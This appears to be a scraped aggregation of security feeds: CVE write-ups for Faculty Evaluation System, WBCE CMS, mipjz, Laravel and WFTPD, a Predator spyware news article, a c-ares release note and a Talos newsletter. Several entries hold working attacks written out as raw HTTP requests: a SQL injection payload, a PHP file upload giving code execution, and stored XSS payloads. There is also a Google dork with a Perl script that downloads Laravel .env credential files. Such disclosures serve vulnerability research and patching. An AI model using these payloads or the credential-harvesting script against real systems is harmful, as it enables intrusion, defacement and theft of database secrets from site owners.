Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/manage\_task.php?id=

Vulnerability location: /eval/admin/manage\_task.php?id=, id

Vulnerability sql: $qry = $conn->query("SELECT * FROM task_list where id = ".$_GET['id'])->fetch_array();

dbname =evaluation\_db

\[+\] Payload: /eval/admin/manage\_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /eval/admin/manage\_task.php?id\=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-33439: bug_report/SQLi-1.md at main · F14me7wq/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.

Permalink

Cannot retrieve contributors at this time

**Faculty Evaluation System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin@admin.com/admin123 (Super Admin account)

Vulnerability url: ip/eval/ajax.php?action=save\_user

Loophole location: Faculty Evaluation System's "/eval/ajax.php?action=save\_user" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /eval/ajax.php?action\=save\_user HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/eval/index.php?page=edit\_user&id=1
Content-Length: 818
Content-Type: multipart/form-data; boundary=---------------------------1037163726497
Cookie: PHPSESSID=qm3tmf7esa9t4jsgeln6vna57r
Connection: close
\-----------------------------1037163726497
Content-Disposition: form-data; name="id"
1
\-----------------------------1037163726497
Content-Disposition: form-data; name="firstname"
Administrator
\-----------------------------1037163726497
Content-Disposition: form-data; name="lastname"
a
\-----------------------------1037163726497
Content-Disposition: form-data; name="img"; filename="hack.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\-----------------------------1037163726497
Content-Disposition: form-data; name="email"
admin@admin.com
\-----------------------------1037163726497
Content-Disposition: form-data; name="password"
\-----------------------------1037163726497
Content-Disposition: form-data; name="cpass"
\-----------------------------1037163726497--

The uploaded file path has returned in response.

The files will be uploaded to this directory \\eval\\assets\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2023-33440: bug_report/RCE-1.md at main · F14me7wq/bug_report

Laravel version 10.11 suffers from database disclosure and information leakage vulnerabilities.

====================================================================================================================================  
| # Title     : Laravel 10.11 Information Disclosure MySQL Credential Disclosure Vulnerability                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://laravel.com/                                                                                               |    
| # Dork      : db_password filetype:env                                                                                           |  
                "Whoops! There was an error."                                                                                      |  
====================================================================================================================================

note : 

[+] 1 : 

 Laravel's default .env file contains some common configuration values that may differ based on whether your application   
is running locally or on a production web server. These values are then retrieved from various Laravel configuration files   
within the config directory using Laravel's env function.

[+] 2 :  This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc

[+] Poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use Payload : /.env = ( Depending on the server's protection, the result of viewing the file is either direct viewing or downloading the file Or not give you anything )

[+] https://127.0.0.1/lala/.env 

====================================================================================================================================  
| # Title     : Laravel 10.11 sensitive information disclosure Vulnerability                                                       |  
====================================================================================================================================

poc : 

[+]  This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc

[+]  Dorking İn Google Or Other Search Enggine .

[+]  https://127.0.0.1/lalaland/categorie/avant_apres/

[+]  https://youtu.be/tz_w563Nyac  

====================================================================================================================================  
| # Title     : Laravel 10.11 Database Disclosure Exploit                                                                          |  
====================================================================================================================================

poc :

[-] Download the configuration file:

    The following Perl exploit will attempt to download the .env file  
    The .env file contains some common configuration values and connection information to the script database  
    Through the code you can control where to save the downloaded file .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
# Author : indoushka

use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] Laravel from Version 1.0 to 9.47.0 Database Disclosure [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[+] Author : indoushka \n\n";  
print "[-] How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/.env \n";  
print "[+] usage2 : perl $0 localhost /.env \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File=".env";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/.env");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/.env\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Laravel 10.11 Database Disclosure / Information Disclosure

WBCE CMS version 1.6.1 suffers from a cross site scripting vulnerability.

    Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)Version: 1.6.1Bugs:  XSSTechnology: PHPVendor URL: https://wbce-cms.org/Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1Date of found: 03-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1Host: localhostContent-Length: 976sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-platform: "Linux"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtOAccept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167Connection: close------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="reqid"187de34ea92ac------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="cmd"upload------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="target"l1_Lw------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="mtime[]"1683056102------WebKitFormBoundary5u4r3pOGl4EnuBtO--3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)========================================================================================================================###XSS-2###1. go to pages  (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)2. add page3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3Epoc request:POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1Host: localhostContent-Length: 143Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475Connection: closepage_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php

WBCE CMS 1.6.1 Cross Site Scripting

Security researchers have shared a deep dive into the commercial Android spyware called Predator, which is marketed by the Israeli company Intellexa (previously Cytrox).
Predator was first documented by Google's Threat Analysis Group (TAG) in May 2022 as part of attacks leveraging five different zero-day flaws in the Chrome web browser and Android.
The spyware, which is delivered by means of

Security researchers have shared a deep dive into the commercial Android spyware called Predator, which is marketed by the Israeli company **Intellexa** (previously Cytrox).

Predator was first documented by Google's Threat Analysis Group (TAG) in May 2022 as part of attacks leveraging five different zero-day flaws in the Chrome web browser and Android.

The spyware, which is delivered by means of another loader component called Alien, is equipped to record audio from phone calls and VoIP-based apps as well as gather contacts and messages, including from Signal, WhatsApp, and Telegram.

Its other functionalities allow it to hide applications and prevent applications from being executed upon rebooting the handset.

"A deep dive into both spyware components indicates that Alien is more than just a loader for Predator and actively sets up the low-level capabilities needed for Predator to spy on its victims," Cisco Talos said in a technical report.

Spyware like Predator and NSO Group's Pegasus are carefully delivered as part of highly-targeted attacks by weaponizing what are called zero-click exploit chains that typically require no interaction from the victims and allow for code execution and privilege escalation.

"Predator is an interesting piece of mercenary spyware that has been around since at least 2019, designed to be flexible so that new Python-based modules can be delivered without the need for repeated exploitation, thus making it especially versatile and dangerous," Talos explained.

Both Predator and Alien are designed to get around security guardrails in Android, with the latter loaded into a core Android process called Zygote to download and launch other spyware modules, counting Predator, from an external server.

It's currently not clear how Alien is activated on an infected device in the first place. However, it's suspected to be loaded from shellcode that's executed by taking advantage of initial-stage exploits.

"Alien is not just a loader but also an executor — its multiple threads will keep reading commands coming from Predator and executing them, providing the spyware with the means to bypass some of the Android framework security features," the company said.

The various Python modules associated with Predator make it possible to accomplish a wide array of tasks such as information theft, surveillance, remote access, and arbitrary code execution.

The spyware, which arrives as an ELF binary before setting up a Python runtime environment, can also add certificates to the store and enumerate the contents of various directories on disk if it's running on a device manufactured by Samsung, Huawei, Oppo, or Xiaomi.

That said, there are still many missing pieces that could help complete the attack puzzle. This comprises a main module called tcore and a privilege escalation mechanism dubbed kmem, both of which have remained elusive to obtain thus far.

Cisco Talos theorized that tcore could have implemented other features like geolocation tracking, camera access, and simulating a shutdown to covertly spy on victims.

The findings come as threat actors' use of commercial spyware has witnessed a surge in recent years just as the number of cyber mercenary companies supplying these services are on an upward trajectory.

While these sophisticated tools are intended for exclusive use by governments to counter serious crime and combat national security threats, they have also been abused by customers to surveil on dissidents, human rights activists, journalists, and other members of the civil society.

As a case in point, digital rights group Access Now said that it uncovered evidence of Pegasus targeting a dozen people in Armenia – including an NGO worker, two journalists, a United Nations official, and a human rights ombudsperson in Armenia. One of the victims was hacked at least 27 times between October 2020 and July 2021.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

"This is the first documented evidence of the use of Pegasus spyware in an international war context," Access Now said, adding it began an investigation after Apple sent notifications to the individuals in question that they may have been a victim of state-sponsored spyware attacks in November 2021.

There are no conclusive links that connect the spyware use to a specific government agency in either Armenia or Azerbaijan. It's worth noting that Armenia was outed as a customer of Intellexa by Meta in December 2021 in attacks aimed at politicians and journalists in the nation.

What's more, cybersecurity company Check Point earlier this year disclosed that various Armenian entities have been infected with a Windows backdoor referred to as OxtaRAT as part of an espionage campaign aligned with Azerbaijani interests.

In a more unusual turn of events, The New York Times and The Washington Post reported this week that the Mexican government may be spying on itself by using Pegasus against a senior official in charge of investigating alleged military abuses.

Mexico is also the first and most prolific user of Pegasus, despite its promises to cease the illegal use of the notorious spyware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Predator Android Spyware: Researchers Sound the Alarm on Alarming Capabilities

c-ares is an asynchronous resolver library. ares_inet_net_pton() is vulnerable to a buffer underflow for certain ipv6 addresses, in particular "0::00:00:00/2" was found to cause an issue.  C-ares only uses this function internally for configuration purposes which would require an administrator to configure such an address via ares_set_sortlist(). However, users may externally use ares_inet_net_pton() for other purposes and thus be vulnerable to more severe issues. This issue has been fixed in 1.19.1.


**c-ares version 1.19.1**

This is a security and bugfix release.

A special thanks goes out to the Open Source Technology Improvement Fund  
(https://ostif.org) for sponsoring a security audit of c-ares performed by X41  
(https://x41-dsec.de).

**Security**

o CVE-2023-32067. High. 0-byte UDP payload causes Denial of Service \[12\]  
o CVE-2023-31147. Moderate. Insufficient randomness in generation of DNS  
query IDs \[13\]  
o CVE-2023-31130. Moderate. Buffer Underwrite in ares\_inet\_net\_pton() \[14\]  
o CVE-2023-31124. Low. AutoTools does not set CARES\_RANDOM\_FILE during cross  
compilation \[15\]

**Bug fixes**

o Fix uninitialized memory warning in test \[1\]  
o Turn off IPV6\_V6ONLY on Windows to allow IPv4-mapped IPv6 addresses \[2\]  
o ares\_getaddrinfo() should allow a port of 0 \[3\]  
o Fix memory leak in ares\_send() on error \[4\]  
o Fix comment style in ares\_data.h \[5\]  
o Remove unneeded ifdef for Windows \[6\]  
o Fix typo in ares\_init\_options.3 \[7\]  
o Re-add support for Watcom compiler \[8\]  
o Sync ax\_pthread.m4 with upstream \[9\]  
o Windows: Invalid stack variable used out of scope for HOSTS path \[10\]  
o Sync ax\_cxx\_compile\_stdcxx\_11.m4 with upstream to fix uclibc support \[11\]

**Thanks go to these friendly people for their efforts and contributions:**

Brad House (@bradh352)  
@Chilledheart  
Daniel Stenberg (@bagder)  
Douglas R. Reno (@renodr)  
Gregor Jasny (@gjasny)  
Jay Freeman (@saurik)  
@lifenjoiner  
Nikolaos Chatzikonstantinou (@createyourpersonalaccount)  
Yijie Ma (@yijiem)  
(9 contributors)

**References to bug reports and discussions on issues:**

\[1\] = #515  
\[2\] = #520  
\[3\] = #517  
\[4\] = #511  
\[5\] = #513  
\[6\] = #512  
\[7\] = #510  
\[8\] = #509  
\[9\] = #507  
\[10\] = #502  
\[11\] = #505  
\[12\] = GHSA-9g78-jv2r-p7vc  
\[13\] = GHSA-8r8p-23f3-64c2  
\[14\] = GHSA-x6mf-cxr9-8q6v  
\[15\] = GHSA-54xr-f67r-4pc4

CVE-2023-31130: Release 1.19.1 · c-ares/c-ares

In WFTPD 3.25, usernames and password hashes are stored in an openly viewable wftpd.ini configuration file within the WFTPD directory. NOTE: this is a product from 2006.

Change Mirror Download

    # Exploit Title: WFTPD 3.25 - Unprotected Credential Storage# Date: 04/01/2023# Exploit Author: golem445# Vendor Homepage: https://www.texis.com/# Tested on: Windows 10# CVE: CVE-2023-33263# #Description: Usernames and hashes are stored in an openly viewable wftpd.ini configuration file within the host WFTPD directory

CVE-2023-33263: WFTPD 3.25 Credential Disclosure ≈ Packet Storm

Steam, the most popular video game storefront on PCs, only recently announced that it was ending support for Windows 7 and 8, and even then, it won’t be official until January.

Thursday, May 25, 2023 14:05

Welcome to this week’s edition of the Threat Source newsletter.

As a longtime macOS user, I must admit I’m behind the times when it comes to Microsoft Windows. Since buying a Steam Deck, I’ve actually come to learn more about Linux and the Proton compatibility layer than I ever did about Windows.

But it still came as a shock to me this week when I uncovered a weird trend on social media: People bragging about still using Windows 7.

Microsoft stopped putting out free security updates for Windows 7 in January 2020 and only more recently stopped offering its paid Extended Security Updates (ESU). The company explicitly told users at the beginning of this year that it was unsafe to continue to keep using Windows 7 and that users should upgrade to Windows 10 or use a new machine that can run Windows 11.

Yet I still found an entire subreddit dedicated to keeping Windows 7 up and running on computers and countless posts promoting how well the 13-year-old operating system runs with modern GPUs and graphics cards.

Steam, the most popular video game storefront on PCs, only recently announced that it was ending support for Windows 7 and 8, and even then, it won’t be official until January. And Roblox, which is quietly one of the biggest video games in the world, only recently ended support for Windows 7 and 8.

I’m sure there are other examples of this among other types of software, but video games are the most specific corner of the internet I’m in, so that’s my frame of reference.

The moral of the story here is that using Windows 7 to do anything, but especially connecting to the internet (which is required to download and play video games) is a terrible idea. Attackers are always targeting outdated operating systems because they’re the most likely to be unpatched and vulnerable.

Running an operating system that is no longer receiving any type of security updates is extremely dangerous. If infected, that single machine could also be used as a springboard for the attacker to target and infect other machines on your network.

Since the start of this year, there have been 47 vulnerabilities discovered in Windows 7, according to the U.S.’s National Institute of Standards and Technology Vulnerability Database. There are even more security issues with third-party software running on Windows 7.

Just because something is old, doesn’t mean that attackers aren’t paying attention anymore. Without official support or security updates for Windows 7, Microsoft is no longer compelled to disclose formal vulnerabilities with CVEs attached to inform users about any security holes in the operating system.

Upgrading a PC or buying a new one is expensive, I get it. But Windows 7 isn’t a novelty anymore, it’s a security risk. If you feel like you absolutely have to keep Windows 7 running on a machine for some reason, make sure it is isolated from your network or just doesn’t connect to the internet at all.

But more preferably, upgrade to Windows 10. If you’re already using Windows 7, it’s free, and likely whatever hardware you’re using can support Windows 10. If you’re starting from scratch, many online stores have deeply discounted product keys for Windows 10 or 11 for $20 or less — just make sure to download the ISO directly from Microsoft still.

**The one big thing**

Montana recently became the first state in the U.S. to ban the app TikTok, though the law still has a long way to go before it can be enforced. The state’s governor signed a bill last week that prohibits mobile application stores from offering the app in the state by the start of 2024, or else they’ll face fines. However, it’s currently unclear if it’s even feasible for Montana to enforce this ban, as app stores don’t geofence certain applications on its stores, and internet service providers are exempt from having to enforce these rules. TikTok has recently become a target for Republican lawmakers over concerns that its Chinese-backed parent company is collecting and using Americans’ data. TikTok and popular TikTok creators in Montana have already sued the state to stop the law.

**Why do I care?**

Even if you are not an active TikTok user, the ban is noteworthy because it has major implications for American law and the enforcement of the First Amendment in the U.S. Opponents of Montana’s bill say it's a clear violation of the First Amendment. The various legal challenges are likely going to shift through the legal system for months, but any eventual decisions could influence how states view banning certain technology or even books and movies.

**So now what?**

There are many questions still unanswered about how this ban will work or whether it will stand. So for now, interested parties can’t do much but sit back and wait for the legal proceedings to play out.

**Top security headlines of the week**

Apple released a security update for many of its devices last week that **fixed three zero-day vulnerabilities in the WebKit browser engine.** A few days after the patches initially dropped, security researchers also discovered the updates addressed a different vulnerability known as “ColdInvite” (CVE-2023-27930). An attacker could exploit ColdInvite to attack a co-processor chip on iPhones and escape its isolation environment, eventually accessing the iPhone’s kernel. The three WebKit vulnerabilities affect some iPhones and iPads. CVE-2023-28204, CVE-2023-32373 and CVE-2023-32409 could be exploited to escape the Web Content sandbox. Google’s Threat Analysis Group and Amnesty International co-reported CVE-2023-32409, which led many security experts to speculate means attackers exploited this issue to spread spyware. (SecurityWeek, Forbes)

**Two popular Android set-top TV boxes sold on Amazon are preloaded with malware** that quietly generates revenue for the manufacturers in the background. The devices click on ads while running without the user knowing and connect to a global botnet of other infected Android devices around the globe. Despite the reported security issues, the devices were still for sale on Amazon as of earlier this week. However, the security researcher who discovered this botnet worked with the internet company hosting the command and control servers that sent directions to devices part of the botnet to take those servers down. However, that doesn’t mean the botnet or ad-click malware could never come back — the easiest solution for users is to replace the devices immediately. (TechCrunch, ArsTechnica)

Security researchers are concerned that **two new top-level domains from Google — .zip and .mov — will cause confusion among users and potentially open the door for scammers.** Because these new TLDs (like .com, .gov, .uk, etc.) are the same as popular file extensions, adversaries could disguise legitimate-looking file names and actually send people to a malicious web address without the user knowing that it could even be a web page. They could also be used to create legitimate-looking URLs that match that of a real website but just add one character in a long string, eventually pointing people to a malicious file or site. However, Google says it's actively monitoring for domain abuse. (Wired, Ars Technica)

**Can’t get enough Talos?**

*   Highlights of Talos IR On Air: Reviewing Q1's top threats
*   Beers with Talos Ep. #135: The XDR Files
*   Talos Takes Ep. #139: RA Group is just the latest example of the ransomware landscape splintering

*   Beers with Talos Ep. #136: Oh hello, “Susan”

**Upcoming events where you can find Talos**

**Cisco Live U.S. (June 4 - 8)**

Las Vegas, NV

**Discover Cyber Workshop for Women** **(June 8)**

Doha, Qatar

**REcon (June 9 - 11)**

Montreal, Canada

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 856777e16c153722ebd3f389197d4b6482f8afb2e51345e1ab19760c486c3f78  
**MD5:** c720ac483a5752c2b69945a8ad673162  
**Typical Filename:** DOC001.exe  
**Claimed Product:** N/A  
**Detection Name:** DeepScan:Generic.BitcoinMiner.9.88FBC400

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

It’s apparently hip to still be using Windows 7

A stored cross-site scripting (XSS) vulnerability in mipjz v5.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description parameter at /index.php?s=/article/ApiAdminArticle/itemAdd.

\[Vulnerability Description\]  
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://github.com/sansanyun/mipjz  
http://www.mipjz.com/

\[Affected Product Code Base\]  
v5.0.5

\[Vulnerability Proof\]

1.  Add an article, insert js code in the description parameter: xss

    POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
    Host: 192.168.11.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    dataId: 
    Content-Length: 426
    Origin: http://192.168.11.102
    Connection: close
    Referer: http://192.168.11.102/index.php?s=/admin/
    Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
    
    {"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss&lt;img src onerror=alert(1)&gt;","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}
    

2.  Visit the article page, the code is loaded and executed

\[Code Details\]

1.  Add an article, receive parameters, and pass it to \\app\\article\\model\\Articles.php:itemAdd for processing

2.  \\app\\article\\model\\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database

3.  Article Details \\app\\article\\controller\\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering

4.  In the "guess you like" area in the article display \\template\\default\\article\\articleDetail.html, directly output the $mipDescription in the previous step, causing the malicious code to be executed

CVE-2023-33750: There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 · Issue #15 · sansanyun/mipjz

A stored cross-site scripting (XSS) vulnerability in mipjz v5.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter at /app/tag/controller/ApiAdminTagCategory.php.

\[Vulnerability Description\]  
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the tag category name field from categoryAdd.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://github.com/sansanyun/mipjz  
http://www.mipjz.com/

\[Affected Product Code Base\]  
v5.0.5

\[Vulnerability Proof\]

1.  Check the code and find that /app/tag/controller/ApiAdminTagCategory.php does not check and filter the name parameter input by the user

2.  Add a tag category, insert the js code at the name parameter: xss

    POST /index.php?s=/tag/ApiAdminTagCategory/categoryAdd HTTP/1.1
    Host: 192.168.11.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    dataId: 
    Content-Length: 286
    Origin: http://192.168.11.102
    Connection: close
    Referer: http://192.168.11.102/index.php?s=/admin/
    Cookie: jERzUAUdppHHnews=2%2C1; jERzUAUdppHHproduct=1%2C3; csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
    
    {"pid":0,"name":"xss<img src onerror=alert(1)>","url_name":"aaa","seo_title":"","template":"tag.html","detail_template":"tagDetail.html","category_url":"/tag/<url_name>/","category_page_url":"<category_url>index_<page>.html","detail_url":"/tag/<id>.html","description":"","keywords":""}
    

3.  Delete the label category created in the previous step, and any code will be executed in the pop-up prompt box

Tag

#windows